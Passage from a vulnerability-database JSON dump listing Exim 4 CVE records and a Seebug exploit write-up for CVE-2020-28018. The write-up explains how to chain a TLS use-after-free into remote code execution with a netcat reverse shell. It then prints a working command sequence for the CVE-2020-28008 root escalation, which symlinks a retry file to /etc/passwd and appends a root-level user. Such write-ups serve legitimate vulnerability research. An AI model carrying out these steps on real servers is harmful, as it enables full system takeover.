"baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28012", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28012"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28012", "href": "https://ubuntu.com/security/CVE-2020-28012", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T13:45:58", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose\nsensitive information from process memory to an unauthenticated SMTP\nclient.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[leosilva](<https://launchpad.net/~leosilva>) | trusty/xenial ESM not-affected code not present\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28023", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28023"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28023", "href": "https://ubuntu.com/security/CVE-2020-28023", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-09T16:52:52", "description": "Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it\nmishandles \"-F '.('\" on the command line, and thus may allow privilege\nescalation from any user to root. This occurs because of the interpretation\nof negative sizes in strncpy.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28013"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28013", "href": "https://ubuntu.com/security/CVE-2020-28013", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:51:41", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read because\npdkim_finish_bodyhash does not validate the relationship between\nsig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header\nmight lead to a leak of sensitive information from process memory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28025", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28025"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28025", "href": "https://ubuntu.com/security/CVE-2020-28025", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-09T16:52:22", "description": "Exim 4 before 4.94.2 has Improper Restriction of Write Operations within\nthe Bounds of a Memory Buffer. This occurs when processing name=value pairs\nwithin MAIL FROM and RCPT TO commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28022"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28022", "href": "https://ubuntu.com/security/CVE-2020-28022", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-09T16:51:47", "description": "Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By\nleveraging a delete_pid_file race condition, a local user can delete\narbitrary files as root. This involves the -oP and -oPX options.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.3, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2021-27216", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.3, "vectorString": "AV:L/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27216"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2021-27216", "href": "https://ubuntu.com/security/CVE-2021-27216", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2023-06-14T14:00:55", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper\nvalidation of recipient address in deliver_message() function in\n/src/deliver.c may lead to remote command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-04T00:00:00", "type": "ubuntucve", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-04T00:00:00", "id": "UB:CVE-2019-10149", "href": "https://ubuntu.com/security/CVE-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T10:26:52", "description": "# CVE-2020-28018: Exim Use-after-free (UAF) leading to RCE\n\n## Introduction\n\nThere exists a Use-after-free (UAF) vulnerability in `tls-openssl.c` that allow remote unauthenticated attackers to corrupt internal memory data, thus finally achieving remote code execution.\n\nPrimitives:\n\n- [x] Memory Leakage\n- [x] Arbitrary read primitive\n- [x] Write-What-Where primitive\n\nWith the use of all those primitives chained together it is possible to fully bypass all the available exploit mitigations finally ending up on a remote code execution as the exim user.\n\nThis vulnerability has been released among a huge list of vulnerabilities, the official Qualys report chains the Use-After-Free with CVE-2020-28008 to perform a Local Privilege Escalation (LPE) once RCE has been achieved.\n\n## Pre-requisites\n\nThe exim, should be configured / compiled in the following way:\n\n- TLS is enabled\n- OpenSSL is used (instead of GnuTLS)\n- Exim is one of the vulnerable versions\n- `X_PIPE_CONNECT` is disabled\n\nYou can use the `checker.py` script to check if a remote server is on a vulnerable version and has some needed requisites for it to be exploitable.\n\n**[!]** `checker.py` does NOT trigger the vulnerability, just checks for vulnerable version, check if PIPELINING and TLS are enabled. This means this checker does not check for patch, which means that it can generate false positives.\n\n## Vulnerable code\n\nAs we already know, the vulnerability is located at `tls-openssl.c`.\n\n```c\n/*************************************************\n* Write bytes down TLS channel *\n*************************************************/\n\n/*\nArguments:\n ct_ctx client context pointer, or NULL for the one global server context\n buff buffer of data\n len number of bytes\n more\t further data expected soon\n\nReturns: the number of bytes after a successful write,\n -1 after a failed write\n\nUsed by both server-side and client-side TLS.\n*/\n\nint\ntls_write(void * ct_ctx, const uschar *buff, size_t len, BOOL more)\n{\nint outbytes, error, left;\nSSL * ssl = ct_ctx ? ((exim_openssl_client_tls_ctx *)ct_ctx)->ssl : server_ssl;\nstatic gstring * corked = NULL;\n\nDEBUG(D_tls) debug_printf(\"%s(%p, %lu%s)\\n\", __FUNCTION__,\n buff, (unsigned long)len, more ? \", more\" : \"\");\n\n/* Lacking a CORK or MSG_MORE facility (such as GnuTLS has) we copy data when\n\"more\" is notified. This hack is only ok if small amounts are involved AND only\none stream does it, in one context (i.e. no store reset). Currently it is used\nfor the responses to the received SMTP MAIL , RCPT, DATA sequence, only. */\n/*XXX + if PIPE_COMMAND, banner & ehlo-resp for smmtp-on-connect. Suspect there's\na store reset there. */\n\nif (!ct_ctx && (more || corked))\n {\n#ifdef EXPERIMENTAL_PIPE_CONNECT\n int save_pool = store_pool;\n store_pool = POOL_PERM;\n#endif\n\n corked = string_catn(corked, buff, len);\n\n#ifdef EXPERIMENTAL_PIPE_CONNECT\n store_pool = save_pool;\n#endif\n\n if (more)\n return len;\n buff = CUS corked->s;\n len = corked->ptr;\n corked = NULL;\n }\n\nfor (left = len; left > 0;)\n {\n DEBUG(D_tls) debug_printf(\"SSL_write(%p, %p, %d)\\n\", ssl, buff, left);\n outbytes = SSL_write(ssl, CS buff, left);\n error = SSL_get_error(ssl, outbytes);\n DEBUG(D_tls) debug_printf(\"outbytes=%d error=%d\\n\", outbytes, error);\n switch (error)\n {\n case SSL_ERROR_SSL:\n ERR_error_string_n(ERR_get_error(), ssl_errstring, sizeof(ssl_errstring));\n log_write(0, LOG_MAIN, \"TLS error (SSL_write): %s\", ssl_errstring);\n return -1;\n\n case SSL_ERROR_NONE:\n left -= outbytes;\n buff += outbytes;\n break;\n\n case SSL_ERROR_ZERO_RETURN:\n log_write(0, LOG_MAIN, \"SSL channel closed on write\");\n return -1;\n\n case SSL_ERROR_SYSCALL:\n log_write(0, LOG_MAIN, \"SSL_write: (from %s) syscall: %s\",\n\tsender_fullhost ? sender_fullhost : US\"<unknown>\",\n\tstrerror(errno));\n return -1;\n\n default:\n log_write(0, LOG_MAIN, \"SSL_write error %d\", error);\n return -1;\n }\n }\nreturn len;\n}\n```\n\n`smtp_setup_msg()` is the main function that performs the message reading from client.\n\nOn specific situations, `smtp_reset()` is called, which performs a clean up of all the buffers\nand values.\n\nThis can happen in situations like:\n\n- `HELO`/`EHLO` is received\n- `STARTTLS` is received\n- `RSET` is received\n- At the starting of `smtp_setup_msg()`\n\n\nAt the end of `smtp_reset()`, a call to `store_reset()` is performed.\n\n`store_reset` is a macro wrapping for `store_reset_3()` function.\n\nThe store functions are just functions that manage the dynamic memory.\n\nExim uses a pool allocator on blocks that are received from malloc.\n\nThere is also an interesting functionality which is a growable string\nimplementation.\n\n`gstring` struct:\n\n```c\ntypedef struct gstring {\n int size; /* Current capacity of string memory */\n int ptr; /* Offset at which to append further chars */\n uschar * s; /* The string memory */\n} gstring;\n```\n\nWhen needing more space for concatenating a new string, it calls `gstring_grow()`.\n\nThat function first tries to call `store_extend_3()`, that function tries to extend the memory\nwithin the same pool block.\n\nIt can be useful when the length of the input is not known, but if more memory was allocated after\nit we won't be able to extend it.\n\nThen `gstring_grow()` calls `store_newblock_3()` which just returns a new memory and copies the \nbytes already present in the past one to the new one.\n\nThen the `g->s` pointer is restored from `gstring_catn()`.\n\nIn the function `tls_write()`, we can see there is a `BOOL` called `more`.\n\nIt indicates if there is more stuff to be copied into the string buffer before\nreturning the data back to the user.\n\nIf so, the pointer is not NULL'ed.\n\nIf not, then the data contained in the string buffer is returned to the user.\n\nThis functionality opens some interesting ways trigger a Use-After-Free.\n\nFirst, the pointer to the `gstring` struct is stored at a static variable,\nthis means on future calls to `tls_write()` we will be able to use it.\n\nHow can we free the buffer and then be able to use it?\n\nWe need to make `smtp_setup_msg()` call `smtp_reset()` after one\nof our buffers is still on `server_corked` (not NULL'ed).\n\nAfter the reset, if we call `tls_write()` somehow, the pointer will\nstill be there, thus allowing us to use it after the memory has been freed.\n\n`smtp_reset()` frees all the memory of `POOL_MAIN`, in which our buffer is contained.\n\n\n## Triggering Use-After-Free\n\nTo control the Use-After-Free we need first to initialize a new connection.\n\nAs we want to exploit the `tls_write()` we need first to start a new TLS session.\n\nSo first we send a `EHLO` command, followed by a `STARTTLS` to start the TLS connection.\n\nThen to make `more` be `1` we pipeline a command, and the final one will be the half of a `NOOP`.\n\nWe close the TLS connection and send the rest of the `NOOP` command.\n\nWe now send `EHLO` again, which will make `smtp_reset` be called and free our buffer.\n\nNow we need to start another TLS connection to be able to use `tls_write()` again.\n\nWe send `STARTTLS`.\n\nNow sending any command to the server will end up calling `tls_write()` for returning a response.\n\nBut... `server_corked` still contains a pointer to somewhere on the freed memory.\n\nAnd that data might be used by another functions as it is freed...so our `gstring` struct will be corrupted\nwith random binary data.\n\nThis is the result of triggering the UAF:\n\n```\ngef\u27a4 p *corked\n$1 = {\n size = 0x54595c9c, \n ptr = 0xa7e800ba, \n s = 0x7e35043433160bd3 <error: Cannot access memory at address 0x7e35043433160bd3>\n}\ngef\u27a4 p corked\n$2 = (gstring *) 0x555ad3be1b58\ngef\u27a4 \n```\n\nThis struct is in this way just when entering `tls_write()` for our command following the `STARTTLS`.\n\nObviously, once the `corked->s` is tried to be accessed results on a SIGSEGV interruption.\n\n# Exploitation\n\nAs mentioned by Qualys, they use three steps to exploit the vulnerability:\n\n1) As the memory is already free, we can make Exim to write heap pointers from structs like `header_line` into our buffer, so when `tls_write()` is called, it will be returned to the user. This way we have a memory leak to continue our exploitation.\n2) Once we know the heap memory addresses, we can craft an arbitrary read primitive to start reading the heap until finding Exim configuration.\n3) Finally the last step is to craft a write-what-where primitive. This way we would be able to inject custom configuration into the buffer found on step 2. We can inject `${run{<command>}}`, where `<command>` is any command the attacker would like to execute, like a reverse shell using netcat. This configuration will be interpreted by `string_expand()`, and will end up executing the command.\n\n## Controlling the Use-After-Free condition\n\nNice, we were able to trigger the Use-After-Free.\n\nNow we need take good control over the UAF so we can craft our\nprimitives successfully and reliably.\n\nUnfortunately, after the buffers from `POOL_MAIN` are\nfreed, our block will be called into `free()` directly.\n\nThis means that memory wont just be accessed through `store_get_3()` or\n`store_newblock_3()` but from any function that uses `malloc()`...like\n`CRYPTO_zalloc()` and many more.\n\nIn this case, in somewhere at `tls_server_start()`, memory is requested\nthrough `malloc()`.\n\nThen copies some binary data into it, corrupting our `gstring` struct.\n\nWe need a way to prevent this, so we can reach `tls_write()` with a sane\n`gstring` struct that points to a valid memory address, else a SIGSEGV\ninterrupt will be performed.\n\nAfter understanding how the Exim Pool allocator works, debugging and trying\nsome commands to see their behaviour on the heap side, we can finally avoid this data being\nwritten into our gstring struct.\n\n## Memory Leak\n\nOnce we have a successful Use-After-Free triggered and we have no problems with our struct being corrupted,\nwe need to try to move the heap in a way a function writes a heap address in the middle of our string (any position\nbefore `g->ptr`).\n\nWe are lucky as the responses, despite being plain text (not a binary protocol) allows us to send NULL bytes back to the client.\n\nWhy does this happen?\n\nResponses are sent back with `SSL_write()`, no problems with NULL bytes.\n\nWhat about strings? `string_catn()` does not cut NULL bytes. Because it uses `memcpy` to copy the data.\n\nThe only way to set a limit is through `g->ptr`, but...as the address is written before `g->ptr` index\nall the data until it is returned to us, thus leaking precious heap addresses.\n\nResult of leaking memory with the PoC:\n\n![](https://images.seebug.org/1621220331674-w331s)\n\n## Arbitrary Read\n\nNow, we have uncovered the heap base....\n\nAnd...the addresses do not change between each connection...so we can start now the way to RCE\n\nBut... how do we overwrite the gstring struct?\n\nIt turned out to be pretty straightforward using the Qualys technique.\n\nESMTP added some stuff to the SMTP protocol, like parameteters for MAIL FROM commands.\n\nUsing a big parameter after the last STARTTLS is enough to overwrite the struct :)\n\nResult:\n\n```\ngef\u27a4 p *corked\n$1 = {\n size = 0x42424242, \n ptr = 0x42424242, \n s = 0x4242424242424242 <error: Cannot access memory at address 0x4242424242424242>\n}\n```\n\nFull control over the `gstring` struct.\n\nNow it is time to craft our arbitrary read primitive.\n\nApparently it appears to be easy...overwrite `g->size` and `g->ptr` with a big value.\n\nThen overwrite `g->s` with the memory address from which we want to read.\n\nOnce the command finishes, `tls_write()` will be called to return back data to the user.\n\nAs the string buffer pointer is corrupted, and pointing to attacker arbitrary location, the data from that location will be returned.\n\nWe might now implement a function that iterates over the chunks reading and trying to find keywords that would let us know if the chunk\nis the one that holds the Exim configuration, if so, we will then go to the last step.\n\nThe function I implemented iterates each `READ_SZ` length along the heap from the heap base.\n\n```\n\t[+] Leaked heap address = 0x55c846683d90\n\t[+] Leaked heap_base = 0x55c8465f4000\n\n[*] Searching for Exim configuration in memory...\n\n[+] Config found at: 0x55c8465f6328\n```\n\nOnce something found, we move on to the last step.\n\n## Write-What-Where\n\nNice! We know heap base address. And more interesting...we know where the Exim configuration is located!\n\nNow it is time to RCE right :P\n\nWe now, have to (somehow) overwrite the exim configuration and inject `${run{<command>}}`. So when `string_expand()` is executed, our command is interpreted and finally we get Arbitrary command execution.\n\nThe easier way to get RCE is using netcat, so just using nc in the command would let us a shell.\n\nBut... how can we craft such write-what-where primitive?\n\nWe must first overwrite (as we did with the arbitrary read primitive) the `gstring` struct.\n\nOnce we have control over it, we might first point `g->s` to the place where we want to write, in this case the Exim configuration address.\n\nThen on the next response to be written to the buffer, the response will be written to where `g->s` points to :)\n\nBut...how can we corrupt the `gstring` struct and get an arbitrary response at the same time?\n\nQualys did not left this very clear on the advisory.\n\nWe need to make a \"MAIL FROM\" command return arbitrary data.\n\nAfter some tries, I though the best solution is with an error message.\n\nWe can choose `ADDR - strlen(\"501 \")`.\n\nSo those four bytes do not corrupt our target.\n\nHow can we make MAIL FROM fail? I use a wrong sender, as sender require a domain, if no domain is specified the error message will contain client-sent data\n\nBut there is a problem with it. As we are sending NULLs, this message is returned instead: \"501 NUL characters are not allowed in SMTP commands\".\n\nSo still no way to control the output of it, as we need NULLs in the request.\n\nWe cannot send another \"MAIL FROM\" to corrupt responses for the simple reason that once we trigger the UAF, more=0 and no access to the freed buffer.\n\nBut from `handle_smtp_call()`, if we send `DATA`, `receive_msg()`. We can trick it not to restore the current pool so we can groom the heap a bit to overwrite the freed buffer.\n\nOnce we overwrite it, we send a MAIL FROM with invalid data pipelined with a valid one. The response will be written into the `s` pointer.\n\n## Remote Code Execution\n\nOnce we achieved write what where, I had problems with netcat directly as some requirements were needed for number of arguments. So I did a: `/bin/sh -c '<nc command here>'`.\n\nI overwrote the MAIL FROM ACL so that pipelining a second MAIL FROM ends up calling `expand_cstring()`, and finally executing my arbitrary command.\n\nThis is an screenshot once I get a shell with the exploit:\n\n![](https://images.seebug.org/1621220347316-w331s)\n\n## Chaining with CVE-2020-28008 LPE\n\n```\n$ /bin/bash\n$ cd /var/spool/exim4/db\n$ rm -f retry*\n$ ln -s -f /etc/passwd retry.passwd\n$ /usr/sbin/exim4 -odf -oep postmaster < /dev/null\n$ # creds => pwner:pwner\n$ echo 'pwner:$6$4KB5snZ5jevx6TFa$VNdvb49sUfHhAQeKCkbpGVDnHUbnNfbpFh.QVjwIqvGlYsyKp8yoYrAfNDcG0XdtoQ2vT9LQPLml6XmCaVCOX/:18757:0:99999:7:::' >> /etc/passwd\n$ su -l pwner\n * Enter pass: pwner *\n# id\nuid=0(root) gid=0(root) groups=0(root)\n#\n```\n\n## System Information\n\nThe tests have been performed in a debian:\n\n```\nroot@research:~# lsb_release -a\nNo LSB modules are available.\nDistributor ID:\tDebian\nDescription:\tDebian GNU/Linux 10 (buster)\nRelease:\t10\nCodename:\tbuster\n```\n\nWith exim version:\n\n```\nroot@research:~# exim --version\nExim version 4.92 #7 built 06-May-2021 19:31:44\nCopyright (c) University of Cambridge, 1995 - 2018\n(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2018\nBerkeley DB: Berkeley DB 5.3.28: (September 9, 2013)\nSupport for: crypteq iconv() OpenSSL DANE DKIM DNSSEC Event OCSP PRDR TCP_Fast_Open\nLookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb passwd\nAuthenticators: cram_md5 plaintext\nRouters: accept dnslookup ipliteral manualroute queryprogram redirect\nTransports: appendfile/maildir/mailstore autoreply lmtp pipe smtp\nFixed never_users: 0\nConfigure owner: 0:0\nSize of off_t: 8\nConfiguration file is /var/lib/exim4/config.autogenerated\n```\n\nMy Exim version is self-compiled, but replicating\ncompilation flags used on mainstream at debian.\n\nConfiguration is the same as the debian default plus some\nminor changes maybe.\n\n## Set up Environment\n\nIn this repository, there is a directory called `exim-4.92`. It is the source code for exim.\n\nFirst install exim with the apt package manager.\n\nDownload the exim directory and the config directory into the machine.\n\nFirst copy `config/Makefile` into `exim-4.92/Local`.\nThen copy `config/eximon.conf` into `exim-4.92/Local`.\n\nNow we run `make`, a `build-linux-*` directory will be created, we will move to it and replace all the \"-O2\" occurrences for\n\"-O0\".\n\nWe will do the same on the `OS/` directory. Finally at the `build-linux-*` we add to the `CFLAGS` variable the `-g`.\n\nRecommended to add the libc and exim source to gdb.\n\nNow `make` and `make install`.\n\n`cp /usr/exim/bin/* /usr/sbin/`\n`cp /usr/sbin/exim /usr/sbin/exim4`\n\nI used this script for generating certs: [https://github.com/volumio/RootFS/blob/master/usr/share/doc/exim4-base/examples/exim-gencert](https://github.com/volumio/RootFS/blob/master/usr/share/doc/exim4-base/examples/exim-gencert)\n\nFinally enable TLS on the exim4 configuration at `/etc/exim4`\nand use the `/etc/exim4/exim.crt` and `/etc/exim4/exim.key` generated by the bash script.\n\nFinally: `sudo update-exim4.conf && systemctl restart exim4`\n\nCheck `systemctl status exim4` to see if everything is right.\n\nIf you get a TLS not currently available error message after trying to `STARTTLS`, check out exim4 logs.\n\nI faced a problem because the key I used for certs was too short. So modify the key bits from the previously mentioned gencert script (I use 4096).\n\n\n## More Information\n\nFor more information visit the [official qualys advisory](https://www.qualys.com/2021/05/04/21nails/21nails.txt)", "cvss3": {}, "published": "2021-05-17T00:00:00", "type": "seebug", "title": "Exim 4 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2020-28018\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-28008", "CVE-2020-28018"], "modified": "2021-05-17T00:00:00", "id": "SSV:99253", "href": "https://www.seebug.org/vuldb/ssvid-99253", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "alpinelinux": [{"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28009", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28009"], "modified": "2021-05-10T19:49:00", "id": "ALPINE:CVE-2020-28009", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28009", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:37", "description": "Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an unauthenticated remote attacker can execute arbitrary code by leveraging the mishandling of continuation lines during header-length restriction.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28020", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28020"], "modified": 